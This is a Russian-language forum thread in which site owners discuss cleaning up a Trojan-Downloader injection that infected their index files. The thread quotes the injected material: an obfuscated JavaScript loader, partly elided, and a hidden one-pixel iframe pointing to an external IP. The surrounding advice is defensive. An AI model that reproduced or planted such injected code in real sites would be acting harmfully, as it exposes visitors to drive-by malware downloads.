Как убить Трояна?

[AdmninsCluba]

обнаружено: троянская программа Trojan-Downloader.VBS.Small.dh

Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?

Спасибо.

ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.

http://virusinfo.info/pravila.html

[Alek$]

Zerony
Я уже даже сказал, где он находится, неужели так трудно посмотреть?
Представляет он собой вот это (только без переносов строк)

Код: Выделить всё

<!-- c9466c2a9176c7e25ae7fe05d3ab97f5
--><script>document.write(unescape("%3Cscript%3Efunction%20xhu56s%28sm0ih5%29%
7Bvar%20xoh1an%3Dnew%20String%28arguments.callee%29%3Bxoh1an%3Dxoh1an.replace%28
/%5B%5Ea-z0-9%28%29+_%5C.%2C-%5D+/ig%2C%20%22%22%29.toUpperCase%28%29%2Cics75w%
3D0%2Cxsmyeh%3D0%2Csaws10%3D%27%27%2Cm3x7rw%3D0%3Bfor%28var%20rac03u%3D0%
3Brac03u%3Cxoh1an.length%3Brac03u++%29m3x7rw+%3Dxoh1an.charCodeAt%28rac03u%2C1%
29%3Bfor%28ics75w%3D0%3Bics75w%3Csm0ih5.length%3Bics75w++%29%7Bvar%20yf3a7s%
3Dsm0ih5%5Bics75w%5D%2Cstx419%3Dxoh1an.substr%28xsmyeh%2C1%29.charCodeAt%280%29%
5Em3x7rw%3Bsaws10+%3DString.fromCharCode%28yf3a7s%5Estx419%29%3Bxsmyeh++%3Bif%
28xsmyeh%3D%3Dxoh1an.length%29xsmyeh%3D0%7Ddocument.write%28saws10%29%3Bsaws10%
3D%27%27%7Dxhu56s%28new%20Array%2829684%2C29608%2C29603%2C29631%2C29619%2C29623%
2C29621%2C29694%2C29659%2C29644%2C29576%2C29647%2C29642%2C29620%2C29640%2C29626%
2C29677%2C29646%2C29621%2C29609%2C29647%2C29640%2C29612%2C29622%2C29612%2C29619%
2C29679%2C29600%2C29644%2C29595%2C29582%2C29589%2C29600%2C29578%2C29693%2C29671%
2C29692%2C29601%2C29621%2C29607%2C29637%2C29627%2C29621%2C29606%2C29621%2C29675%
2C29666%2C29664%2C29601%2C29693%2C29654%2C29612%2C29629%2C29666%2C29622%2C29686%
2C29631%2C29647%2C29631%2C29618%2C29674%2C29599%2C29600%2C29693%2C29681%2C29670%
2C29693%2C29599%2C29609%2C29615%2C29650%2C29684%2C29629%2C29631%2C29616%2C29679%
2C29604%2C29686%2C29650%2C29665%2C29647%2C29617%2C29648%2C29636%2C29635%2C29646%
(и ещё срок 110-120 такой же фигни)
/script%3E"))</script><!--/-->						
<!-- c9466c2a9176c7e25ae7fe05d3ab97f5
--><script>document.write(unescape("%3Cscript%3Efunction%20we8pt1%28vls5km%29%
7Bvar%20m07sct%3Dnew%20String%28arguments.callee%29%3Bm07sct%3Dm07sct.replace%28
/%5B%5Ea-z0-9%28%29+_%5C.%2C-%5D+/ig%2C%20%22%22%29.toUpperCase%28%29%2Ctht0pm%
3D0%2Cxcb3u9%3D0%2Cf1r5ak%3D%27%27%2Ce5yk03%3D0%3Bfor%28var%20s35048%3D0%
3Bs35048%3Cm07sct.length%3Bs35048++%29e5yk03+%3Dm07sct.charCodeAt%28s35048%2C1%
29%3Bfor%28tht0pm%3D0%3Btht0pm%3Cvls5km.length%3Btht0pm++%29%7Bvar%20t0ykc9%
3Dvls5km%5Btht0pm%5D%2Chptm43%3Dm07sct.substr%28xcb3u9%2C1%29.charCodeAt%280%29%
5Ee5yk03%3Bf1r5ak+%3DString.fromCharCode%28t0ykc9%5Ehptm43%29%3Bxcb3u9++%3Bif%
28xcb3u9%3D%3Dm07sct.length%29xcb3u9%3D0%7Ddocument.write%28f1r5ak%29%3Bf1r5ak%
3D%27%27%7Dwe8pt1%28new%20Array%2829037%2C28977%2C28986%2C28966%2C28970%2C28974%
2C28972%2C29031%2C29005%2C29016%2C29052%2C28979%2C28977%2C29007%2C29009%2C28966%
2C29045%2C28980%2C29008%2C28979%2C28974%2C29009%2C28981%2C28975%2C28981%2C28991%
2C28937%2C29043%2C28971%2C28972%2C28975%2C28950%2C28979%2C28949%2C28949%2C28983%
2C29029%2C29027%2C29049%2C28982%2C29002%2C28984%2C28966%2C28964%2C28971%2C28981%
2C28988%2C29041%2C29034%2C29028%2C28994%2C29044%2C28960%2C28986%2C28969%2C29042%
2C28966%2C28931%2C28974%2C29007%2C29001%2C28983%2C29048%2C29027%2C28981%2C28954%
2C28935%2C29027%2C29039%2C29027%2C29023%2C28970%2C28960%2C29039%2C28973%2C28983%
(аналогично первому блоку)
2C28933%29%29%3C/script%3E"))</script><!--/-->

[Kate admin]

Фуф, у меня config.php чистенький.

[Alek$]

Вот файл

Где "вот"?

[Zerony]

вот только эту ерунду мне на все файлы вцепили(

Если вручную поудалять то всё зароботает?

[Alek$]

Zerony
думаю, да.

/*
Оффтопик:
Интересно, почему в заголовке топика слово "троян" написано с большой буквы? Не иначе как от большого уважения к данному виду программ...
*/

[Mic70]

А Если поставить права доступа на все файлы index 444?
(Это я к теме о вирусе с тэгами iframe)

[Тиль]

Очередной напад 06.01.08:

Код: Выделить всё

<iframe src='http://195.2.253.90/tab.php' width='1' height='1' style='visibility: hidden;'></iframe>

По всем файлам index.* и не только.

[Mic70]

Отвечаю сам себе....НЕ повлияет!!! 8)

[VeryPoor]

там была ссылка на ip: 68.178.194.64 (может кому понадобиться?)

анало-гичная фигня.
буду чистить.
а че такое 444? где поставить? у меня фар для фтп. там три тройки галочек только... (ламер я, ламер)

[crash]

VeryPoor
поставить с помощью фара по фтп. А че такое, так это права доступа

[Mic70]

VeryPoor
Чмод - CHMOD Познакомиться с этой функцией можно тут http://chmod.ru/

[crash]

Kate admin
защитить форум и от заражения или сервер. Кто вам сказал что форум был заражен через него, а не через дыру другого пользователя или вообще дыру в сервере. Поставьте свой сервер, на нем форум, админьте сами сервер или наймите человека, вот 99% вашей безопасности.

[Kate admin]

crash, у меня как раз свой сервер

Кто вам сказал что форум был заражен через него

Через чего-кого? Я ничего не утверждала пока что.

а не через дыру другого пользователя

Интересно. А как через дыру другого пользователя можно заразить форум? Т.е. пришел человек с дырой и через эту его дыру от него пришла на форум зараза - так? (Не пускать пользователей на форум, делов-то ) В данном случае меня бы заинтересовали не дыры у пользователей (все не перелатаешь), а дыры на форуме или сервере (если есть; предметнее смогу поговорить, когда мне наконец-то просканируют сервер, обещают уже совсем скоро).

или вообще дыру в сервере

Маловероятно (по объективным причинам), но это тоже проверяем.

[crash]

А как через дыру другого пользователя можно заразить форум? Т.е. пришел человек с дырой и через эту его дыру от него пришла на форум зараза - так? (Не пукать пользователей на форум, делов-то )

знаете что такое shared хостинг?

[Палыч]

Не пускать пользователей на форум, делов-то

Речь шла о другом пользователе вашего сервера, если вы этого не поняли.

Добавлено спустя 20 секунд:

crash
дуплет